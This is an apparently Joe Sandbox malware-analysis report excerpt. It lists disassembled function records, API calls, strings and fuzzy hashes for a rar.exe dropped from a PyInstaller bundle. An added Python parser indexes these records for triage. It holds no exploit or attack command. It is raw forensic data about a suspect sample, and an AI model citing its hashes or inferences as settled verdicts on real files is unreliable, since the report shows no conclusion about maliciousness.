• Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
• Instruction ID: 4bd00e45abcf67713c6ed388030a84410cf6b5f84fc190662311dcf3261b7fce
• Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
• Instruction Fuzzy Hash: 9A51E362B186D24AE7298B39D8413696A91FB49B94F4C8331C7AC87BE6CE2CD4448700
APIs
• GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF6BBCD475B,?,00000000,?,?,00007FF6BBCD4620,?,00000000,?), ref: 00007FF6BBCE4633
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: the same ten dump regions (00007FF6BBCB0000 through 00007FF6BBD5E000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: UNC$\\?\
• API String ID: 1611563598-253988292
• Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
• Instruction ID: 0d4074e11ae2582e28d9e59eba0529175576960e77a27e65758cd0408d8f1404
• Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
• Instruction Fuzzy Hash: A041A211A2968281EA24EB59E40A1BD6375BF4DBC4F818531EF6DC76F6EF2CF645C200
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: the same ten dump regions (00007FF6BBCB0000 through 00007FF6BBD5E000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: FileModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe
• API String ID: 3307058713-636270199
• Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
• Instruction ID: 0a7fbdb402f55cc080c7ce1fc9c32c5913951b85b86a75327aedf4a53e3554dd
• Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
• Instruction Fuzzy Hash: 8541A136A08A6295EB1CDF29D4400B87795FB48B94B498235EB4E83BA5DF3DE441C704
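The function records above (APIs, Strings, Memory Dump Source, IDA Plugin snapshot, Similarity IDs and fuzzy hashes) follow a fixed text layout, so they can be parsed and indexed rather than read by hand. The parser below is an added example, not Joe Sandbox code; the sample input is an inline excerpt of the two preceding records (the GetCurrentDirectoryW function and the one carrying the `_MEI32202\rar.exe` path). Matching functions across two reports on an identical `API String ID` is this example's own assumption about how to use that field, not a documented vendor method.

```python
"""Parse Joe Sandbox per-function Similarity records into structured data.

Added example, not part of the Joe Sandbox report. SAMPLE is an inline
excerpt of two records from this page, embedded here so the code runs offline.
"""
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF6BBCD475B,?,00000000,?,?,00007FF6BBCD4620,?,00000000,?), ref: 00007FF6BBCE4633
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: UNC$\\\\?\\
• API String ID: 1611563598-253988292
• Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
• Instruction ID: 0d4074e11ae2582e28d9e59eba0529175576960e77a27e65758cd0408d8f1404
• Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
• Instruction Fuzzy Hash: A041A211A2968281EA24EB59E40A1BD6375BF4DBC4F818531EF6DC76F6EF2CF645C200
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: FileModuleName_invalid_parameter_noinfo
• String ID: C:\\Users\\user\\AppData\\Local\\Temp\\_MEI32202\\rar.exe
• API String ID: 3307058713-636270199
• Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
• Instruction ID: 0a7fbdb402f55cc080c7ce1fc9c32c5913951b85b86a75327aedf4a53e3554dd
• Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
• Instruction Fuzzy Hash: 8541A136A08A6295EB1CDF29D4400B87795FB48B94B498235EB4E83BA5DF3DE441C704
"""

SECTION_HEADERS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)        # "Name.MODULE(args), ref: addr" lines
    strings: list = field(default_factory=list)     # referenced string lines, if rendered
    source_file: str = ""                           # primary .sdmp the function was lifted from
    snapshot: str = ""                              # IDA plugin snapshot (.jbxd)
    similarity: dict = field(default_factory=dict)  # API ID, String ID, fuzzy hashes, ...


def parse_records(text):
    """Split report text into FunctionRecords; each record begins at an 'APIs' header."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                      # start of the next function block
            current = FunctionRecord()
            records.append(current)
            section = line
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            current.apis.append(body)
        elif section == "Strings":
            current.strings.append(body)
        elif section == "Memory Dump Source" and body.startswith("Source File:"):
            current.source_file = body[len("Source File:"):].strip()
        elif section == "Joe Sandbox IDA Plugin" and body.startswith("Snapshot File:"):
            current.snapshot = body[len("Snapshot File:"):].strip()
        elif section == "Similarity":
            key, _, value = body.partition(":")  # split on the first colon only; Windows paths keep theirs
            current.similarity[key.strip()] = value.strip()
    return records


def index_by_api_string_id(records):
    """Map 'API String ID' -> records, so two reports can be joined on that key (assumption: exact match)."""
    idx = {}
    for r in records:
        key = r.similarity.get("API String ID")
        if key:
            idx.setdefault(key, []).append(r)
    return idx


# PyInstaller one-file bundles extract to %TEMP%\_MEI<digits>\; a function carrying such
# a path is a quick pivot to the dropped helper binary (rar.exe here).
MEI_RE = re.compile(r"\\_MEI\d+\\", re.IGNORECASE)


def pyinstaller_temp_refs(records):
    """Return (API ID, String ID) for functions whose String ID names a _MEI extraction dir."""
    return [(r.similarity.get("API ID", ""), r.similarity["String ID"])
            for r in records if MEI_RE.search(r.similarity.get("String ID", ""))]


def opcode_id_matches_fuzzy_hash(record):
    """In these records 'Opcode ID' and 'Opcode Fuzzy Hash' carry the same value; flag any that differ."""
    return record.similarity.get("Opcode ID") == record.similarity.get("Opcode Fuzzy Hash")


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for api_id, path in pyinstaller_temp_refs(recs):
        print(f"PyInstaller temp reference in function {api_id}: {path}")
```

Feed it the text of a whole report section and join the resulting index against a second analysis to see which functions carry the same API/String pairs; the `_MEI` check is the one you would extend with other dropped-tool names once you know what the bundle carries.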
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: the same ten dump regions (00007FF6BBCB0000 through 00007FF6BBD5E000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFilewcsstr
                                                                                                                                                                                                                              • String ID: System Volume Information\
                                                                                                                                                                                                                              • API String ID: 1592324571-4227249723
                                                                                                                                                                                                                              • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                              • Instruction ID: dd078fd637aa7123ec91acf19b1e49f8547c94780e15170fa8e2aa943a93410c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD31FE22A1A68185EB55DB29A1592BE6B70BF4DBC0F445171EF8D877B6CF3CE0498700
APIs
Strings
Similarity
• API ID: LoadString$fflushswprintf
• String ID: %d.%02d$[
• API String ID: 1946543793-195111373
• Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
• Instruction ID: 9b621eea2d46b225b548aa00833d60d182a9077c66403f78af8e286db4b3047b
• Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
• Instruction Fuzzy Hash: A1319A21A19AC251FA64EB18E0993BA63B0FF98784F444139E75D8B6E6DF3CE544C780
APIs
Strings
Similarity
• API ID: snprintf
• String ID: $%s$@%s
• API String ID: 4288800496-834177443
• Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
• Instruction ID: fbe0fb09ddfd6321c2c165ea937744a0ab3ac434dc1e3bcc0a65638ae7336eca
• Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
• Instruction Fuzzy Hash: 7D31BF22B08A82A5EA14DB5DE4487E92770FB88784F401132EF4D97B79DF3DE509C700
APIs
Strings
Similarity
• API ID: swprintf
• String ID: fixed%u.$fixed.
• API String ID: 233258989-2525383582
• Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
• Instruction ID: 34a6b02415d1334cb26c491eec386144e161fbc00d33f608ed070e6709c26d40
• Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
• Instruction Fuzzy Hash: 3431B722A1868192FB10DB29E4053ED6370FB58790F900232EB5D976FADF3CE146CB10
APIs
Strings
Similarity
• API ID: LoadString
• String ID: Done
• API String ID: 2948472770-499744565
• Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
• Instruction ID: a1690369636a684e0361727373512c506631f059deaeb3c1837ef56c7a5fc0be
• Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
• Instruction Fuzzy Hash: 72112B65B18B8186EA189F1AE844169B7A1FF9CFC0B54853ACF0CD3334EE7CE6468244
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: ;%%0%du
                                                                                                                                                                                                                              • API String ID: 233258989-2249936285
                                                                                                                                                                                                                              • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                              • Instruction ID: 630c1e63ec4a75a0c67daeac27bfdfad8b78c889fb7e135e4e36049e772fc598
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC11B622B08A8546E724DB28E0143E97770FB8C744F894131EB4D877A6DF3CD949CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCE42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6BBCE430F
                                                                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,00007FF6BBCD0BED,?,?,00000000,?,?,00007FF6BBCCF30F,00000000,00007FF6BBCB6380,?,00007FF6BBCB2EC8), ref: 00007FF6BBCD337E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InformationVolumeswprintf
                                                                                                                                                                                                                              • String ID: FAT$FAT32
                                                                                                                                                                                                                              • API String ID: 989755765-1174603449
                                                                                                                                                                                                                              • Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                              • Instruction ID: 8a90e7db5e554a26184524f1dda8d24eb7616a82744356fe7cb7d2be3b24189a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48115121A5CA8281FB60DB18E8952EA63A5FF88344F845131EB4DC3AA5DF3CE115CB04
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                                                                                                                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                                              • API String ID: 564652978-2248577382
                                                                                                                                                                                                                              • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                              • Instruction ID: 479661b8c753edfcdf12562efad7ffae7c6e5fccdc1019d042d46d884d9a4cb6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25E04F21E0884242EA08E72DEC890753360FF6D7B4F905731D23EC25F29F6CA546C341